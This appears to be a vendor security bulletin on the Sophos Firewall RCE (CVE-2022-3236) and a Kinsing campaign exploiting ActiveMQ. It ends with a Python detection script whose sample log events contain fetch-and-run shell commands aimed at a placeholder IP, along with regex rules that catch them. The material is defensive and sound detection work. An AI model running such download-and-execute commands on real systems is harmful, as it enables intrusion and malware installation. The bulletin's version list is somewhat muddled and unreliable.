Sophos Firewall Patch Released for Zero-Day RCE Vulnerability

Subject : Sophos Firewall Patch Released for Zero-Day RCE Vulnerability

Severity : Critical (CVE-2022-3236) CVSS v3.0 Score : 9.8

Date : 2023-12-11

Information

  A firewall is software or hardware on the network that checks the information passing into and out of the network system. Rules are established to control what enters and leaves, and the firewall checks whether the data to be transmitted is secure by comparing it against the rules the user has set. It still depends on the user's own decisions, however: if the data is not secure but is permitted by the user's rules, the firewall will allow it to pass through.

  Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Incident

  Security software company Sophos has released an update patch for its firewall after discovering that attackers were using a zero-day vulnerability to attack customer networks. This affects Sophos Firewall v19.0 MR1 (19.0.1) and older versions. The vulnerability involves code injection in the User Portal and Webadmin that could result in remote code execution.

  The vulnerability exists in the way that the Sophos Firewall handles user-supplied input. When an attacker sends a specially crafted request to the User Portal or Webadmin, they can trick the firewall into executing arbitrary code.

  The company said the vulnerability was used to target a specific group of organizations, especially in the South Asian region. To address the problem, it is recommended to ensure that the User Portal and Webadmin are not exposed to the WAN, or to update to the latest supported version.

Pic 1.1 Sophos userportal page

Solution

  Users running older versions of Sophos Firewall must upgrade to the latest supported version.

  • v19.5 GA
  • v19.0 MR2 (19.0.2)
  • v19.0 GA, MR1 and MR1-1
  • v18.5 MR5 (18.5.5)
  • v18.5 GA, MR1, MR1-1, MR2, MR3 and MR4
  • v18.0 MR3, MR4, MR5 and MR6
  • v17.5 MR12, MR13, MR14, MR15, MR16 and MR17
  • v17.0 MR10

The important thing is security systems: we must stay attentive and keep monitoring as usual.
For more information please contact
Email : sales@inetms.co.th
065 149 2822 (Ms. Suphatson)
061 404 5895 (Ms. Thanyakan)
063 204 4534 (Ms. Atsamaphorn)
065 929 6330 (Ms. Kansinee)


Weekly Interesting CVE

Malware News or Campaign IOC/IOA

No : 1

Campaign Name : Kinsing Used To Exploit ActiveMQ CVE-2023-46604 Vulnerability In Cryptomining Operations

Detection in Thailand (/1m Divs) : 25

Detection Date : 12/12/2023

Attack Type : Cryptomining, Downloader, Rootkit, Tool, Vulnerability

Severity : Medium

Description :

  The vulnerability was published in October 2023 and is tracked as CVE-2023-46604. It is being used to deliver Kinsing malware once a target has been identified by the attacker's vulnerability scan. The attacker exploits the OpenWire module in ActiveMQ to retrieve XML files from an attacker-controlled web server. When executing unauthorized code, cURL is used to pull additional shell scripts that perform various functions on the victim's system: the scripts download a rootkit, remove other malware, download and run Kinsing, and manage the firewall. The Kinsing malware then downloads and installs the cryptominer and a script that lets it spread through the network and further infect the victim's infrastructure. Analysis of Kinsing reveals payload repositories, C2 infrastructure, and attack machines used primarily to target additional vulnerable servers. The malware itself is not obfuscated and has many functions, including C2 URL retrieval and network scanning; overall, Kinsing appears to be focused on cryptominers and financial gain.

Solution :

  1. Update your antivirus, Windows, and the device you are using to the latest version.

  2. Always check the link before clicking.

Ref. 1. https://blog.sekoia.io/activemq-cve-2023-46604-exploited-by-kinsing-and-overview-of-this-threat/
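The chain described above (the broker's java process being driven to run cURL, which then pulls staged shell scripts from an attacker-controlled host) is something endpoint process telemetry can catch. The following is an added detection example, not code from the original page or from any vendor: it runs two process-creation rules over constructed sample events in a simple log format assumed here, and the hosts, IP addresses and paths in the sample are made up.

```python
import re

# Constructed process-creation events (sample input, not from the page).
# Assumed line format: "<utc-time> <host> <parent_image> <child_image> <child_cmdline>"
SAMPLE_EVENTS = [
    "2023-12-12T10:01:05Z mq-01 /usr/bin/java /bin/sh sh -c curl -s http://198.51.100.7/ap.sh | bash",
    "2023-12-12T10:02:10Z mq-01 /bin/sh /usr/bin/curl curl -s http://198.51.100.7/ap.sh",
    "2023-12-12T10:03:00Z web-02 /bin/bash /usr/bin/curl curl -s https://updates.example.com/release.json",
    "2023-12-12T10:04:00Z mq-01 /usr/bin/java /usr/bin/java java -jar activemq.jar",
    "2023-12-12T10:05:00Z mq-01 /usr/bin/java /usr/bin/wget wget -q -O- http://198.51.100.7/kinsing",
]

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash"}
URL_RE = re.compile(r"https?://\S+")
BARE_IP_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}[/:]")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|da)?sh\b")

def parse_event(line):
    """Split one event line into its fields; image paths are reduced to basenames."""
    ts, host, parent, child, cmdline = line.split(" ", 4)
    return {"ts": ts, "host": host, "parent": parent.rsplit("/", 1)[-1],
            "child": child.rsplit("/", 1)[-1], "cmdline": cmdline}

def classify(event):
    """Return the names of the rules an event matches (empty list if benign)."""
    hits = []
    urls = URL_RE.findall(event["cmdline"])
    # Rule 1: the broker runs as a java process and has no business spawning a
    # shell or a download utility; the described chain uses cURL from that process.
    if event["parent"] == "java" and event["child"] in SHELLS | DOWNLOADERS:
        hits.append("broker_spawned_shell_or_downloader")
    # Rule 2: a shell script fetched from a bare IP address, or a download piped
    # straight into a shell, matches the staged-script behaviour described.
    if any(BARE_IP_RE.match(u) for u in urls) and (
            PIPE_TO_SHELL_RE.search(event["cmdline"]) or any(u.endswith(".sh") for u in urls)):
        hits.append("script_fetched_from_bare_ip")
    return hits

def scan(lines):
    """Run both rules over every event and return the findings in log order."""
    findings = []
    for line in lines:
        event = parse_event(line)
        rules = classify(event)
        if rules:
            findings.append({"ts": event["ts"], "host": event["host"],
                             "child": event["child"], "rules": rules})
    return findings
```

Only the three events on mq-01 are reported; the routine update fetch on web-02 and the broker's own java child match neither rule.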

19 December 2023
